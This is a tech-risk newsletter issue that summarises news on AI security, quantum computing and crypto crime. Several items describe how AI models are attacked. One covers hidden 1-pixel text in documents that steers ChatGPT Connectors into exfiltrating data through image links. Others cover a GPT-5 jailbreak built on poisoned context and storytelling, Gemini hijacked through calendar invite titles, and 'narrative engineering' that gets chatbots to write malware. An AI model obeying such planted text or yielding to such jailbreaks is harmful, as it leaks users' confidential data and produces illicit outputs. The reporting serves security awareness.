TechRisk #134: Indirect prompt attacks

Plus, when gibberish isn’t garbage, study reveals quantum advantages, AI defend system wins $4M, at DEFCON, and more!

Aug 17, 2025

Tech Risk Reading Picks

Indirect prompt injection vulnerability: AgentFlayer, a newly disclosed zero-click vulnerability in ChatGPT’s Connectors feature, is discovered and presented at Black Hat. It allows attackers to steal sensitive data from linked apps like Google Drive and SharePoint without user awareness. The exploit uses indirect prompt injection, hiding malicious instructions in seemingly benign documents (e.g., in invisible 1-pixel text). When ChatGPT processes such a document, it is tricked into ignoring the user’s request and instead retrieving and exfiltrating confidential data, including API keys, via covert image links to attacker-controlled servers. This flaw bypasses existing safeguards, illustrating a broader class of risks in AI systems connected to third-party services, similar to the earlier EchoLeak vulnerability. Security experts warn that such threats are inherent to current AI agent architectures and will likely become more common unless stronger guardrails and dependency controls are implemented. [more]
Misleading and jailbreaking GPT5: Cybersecurity researchers have uncovered a new jailbreak method targeting OpenAI’s GPT-5, using a combination of the Echo Chamber technique and narrative-driven steering to bypass ethical safeguards and elicit prohibited instructions. By seeding conversations with subtly “poisoned” context and embedding harmful intent in innocuous storytelling prompts, attackers can guide the model toward illicit outputs without triggering refusal mechanisms. The approach highlights weaknesses in keyword-based and intent filters, especially in extended dialogues. These techniques (involving the use of indirect prompting) could be used to exploit AI integrations with platforms like Google Drive, Jira, and Microsoft Copilot Studio to exfiltrate sensitive data. [more]
Prompt hacking through Google Calendar invites: Google patched a critical flaw in Gemini, its AI assistant integrated across Google services, that allowed attackers to hijack the assistant via malicious Google Calendar invites. By embedding prompt injections (often hidden in event titles) attackers could trick Gemini into executing harmful actions when users performed normal queries like checking their calendar. The exploit, demonstrated by SafeBreach researchers, required no special model access and bypassed prompt filtering. Such exploit could potentially enable data theft, location tracking, smart home control, and more. Google credited the responsible disclosure for enabling a fix before exploitation and said new safeguards are already deployed to counter similar threats. [more]
Agentic OS based AI tools still lack security and privacy protections: A new academic survey warns that “OS Agents” — AI systems capable of autonomously controlling computers, phones, and browsers — are advancing rapidly, with over 60 models and 50 frameworks emerging since 2023, and tech giants like OpenAI, Google, Apple, and Anthropic racing to deploy them. These agents can understand interfaces, plan multi-step tasks, and execute actions across apps, promising major productivity gains but introducing unprecedented security risks, including prompt injection and data exfiltration attacks that could bypass human safeguards. While current systems excel at simple and repetitive digital work, they still struggle with complex and context-heavy tasks. Future development will hinge on personalization where it could revolutionize work but also deepen privacy concerns. The study stresses that security and privacy protections for these agents are underdeveloped. [more]
AI defend system wins $4M at DEFCON: At DEF CON, DARPA awarded $4 million to Team Atlanta (a collaboration between Georgia Tech, Samsung Research, KAIST, and POSTECH) for winning its two-year AI Cyber Challenge (AIxCC). These teams were tasked to build AI systems that could autonomously find and fix software vulnerabilities. Competing against dozens of teams, Team Atlanta stood out by combining traditional threat-hunting tools with AI to deliver the highest-quality and most accurate patches across 54 million lines of code. The challenge, run with support from companies like Anthropic, Google, OpenAI, Microsoft, and the Linux Foundation, resulted in 77% of synthetic vulnerabilities being patched, up from 37% last year. [more]
Increased malicious usage of LLMs: Russia’s APT28 has deployed LAMEHUG, the first confirmed large language model (LLM)-powered malware, against Ukraine, using stolen Hugging Face API tokens to run real-time attacks disguised by official-looking documents or distracting images, while underground platforms now sell similar AI malware capabilities for $250/month. Security researcher Vitaly Simonovich demonstrated that consumer AI tools like ChatGPT-4o, Copilot, and DeepSeek can be manipulated into producing functional malware in under six hours via “narrative engineering” that bypasses safety controls, revealing a serious vulnerability as AI adoption in enterprises surges. With platforms like Xanthrox AI and Nytheon AI offering uncensored and fully operational malware development environments, the expertise barrier for sophisticated attacks has collapsed. Nation-state-level capabilities are now accessible to anyone with creativity and modest resources. [more]
When gibberish isn’t garbage: A recent study by Assistant Professor Michael Shieh at NUS Computing reveals that AI language models can not only read but also learn from “unnatural language”—text that appears as gibberish to humans, with jumbled syntax, misspellings, and random symbols. Using systematic generation techniques, the team showed that large language models (LLMs) can extract key concepts from these strings, reconstruct their meaning with contextual cues, and even follow instructions when fine-tuned on such data, performing on par with models trained on normal language. This challenges traditional notions of language, showing that LLMs rely on deeper statistical and relational patterns rather than human-readable grammar, with implications for AI robustness, low-resource training, adversarial testing, and interpretability. The findings highlight that AI “language understanding” is fundamentally different from human understanding—structured, abstract, and hidden within what we perceive as noise. [more]
Quantum advantages: A new study by researchers from Caltech, MIT, Google Quantum AI, and AWS proposes a rigorous framework for distinguishing genuine quantum advantages from “pseudo-advantages” that vanish when classical methods catch up. They define five hallmarks of a true advantage: predictability, typicality, robustness, verifiability, and usefulness. In addition, they classify potential advantages into four realms: computation, learning and sensing, cryptography and communication, and space advantages. The authors caution that advances in classical algorithms, noise in quantum systems, and the inherent unpredictability of some advantages (which may require quantum computers themselves to verify) make proving superiority challenging. They argue that both theoretical rigor and practical benchmarking are essential to avoid misallocating resources in this rapidly growing field, noting that the most transformative quantum applications may be unforeseeable until large-scale quantum technologies are in everyday use. [more][more-research_paper]
CrowdStrike Report 2025: CrowdStrike’s 2025 Threat Hunting Report reveals a major shift in the cyber threat landscape, with adversaries not only using AI to supercharge attacks but also increasingly targeting AI platforms themselves, alongside a record surge in cloud intrusions up 136% from 2024. China-linked groups like GENESIS PANDA and MURKY PANDA are exploiting cloud misconfigurations, trusted relationships, and admin tooling to persist and exfiltrate data, while CVE-2025-3248 in Langflow AI shows how AI infrastructure is becoming a prime attack vector. North Korea’s FAMOUS CHOLLIMA demonstrates AI weaponization through deepfakes, identity fraud, and AI-assisted job infiltration, reflecting a 220% spike in such tactics. Identity compromise remains central to cross-domain intrusions, with groups like SCATTERED SPIDER bypassing MFA via vishing to pivot rapidly across SaaS, cloud, and endpoint environments. With 81% of interactive intrusions being malware-free and nation-state targeting rising sharply, the report urges AI-driven defense, cloud-native security, strict access controls, and continuous auditing to counter the converging threats in AI and cloud. [more][more-Crowdstrike]

Web3 Cryptospace Spotlight

$3M phishing attack: A cryptocurrency investor lost over $3 million in Tether (USDT) after unknowingly approving a fraudulent transaction in a phishing scam that mimicked a legitimate wallet address. It exploits the tendency of users to check only the first and last characters. These attacks are the leading cause of crypto losses rather than technical exploits. Such phishing scams have caused over $410 million losses in the first half of 2025. Experts stress verifying full wallet addresses, understanding transaction details, regularly revoking old approvals, and practicing safe habits like avoiding suspicious links. In addition, enabling multi-factor authentication, and using secure wallet management will help to reduce risk. [more]
Crypto exchange breached: Turkish crypto exchange BTCTurk has temporarily halted deposits and withdrawals after detecting a security breach in its hot wallets, with blockchain analysts tracking $49M worth of digital asset leaving the platform. The company, which holds most assets in cold storage, assured users their funds remain safe. It also indicated that Turkish Lira transactions continue unaffected, while law enforcement investigates. [more]
Crypto Crime Taskforce: Tron, Tether, and TRM Labs’ T3 Financial Crime Unit (T3 FCU), launched in September 2024, has frozen over $250 million in illicit crypto assets by collaborating with global law enforcement on cases including money laundering, fraud, and terrorism financing. The frozen assets are more than double the amount reported in its first six month. To expand its reach, the new T3+ program brings exchanges like Binance into a real-time intelligence-sharing network to combat crypto crime amid increasingly rapid and sophisticated hacks. While T3 FCU’s recovery efforts highlight the value of centralized intervention, including Tether’s ability to freeze stolen funds, critics caution that such powers challenge crypto’s decentralized principles, sparking debate over balancing security with user sovereignty. [more]

TECHRISK GURU

TechRisk #134: Indirect prompt attacks

Plus, when gibberish isn’t garbage, study reveals quantum advantages, AI defend system wins $4M, at DEFCON, and more!

Tech Risk Reading Picks

Web3 Cryptospace Spotlight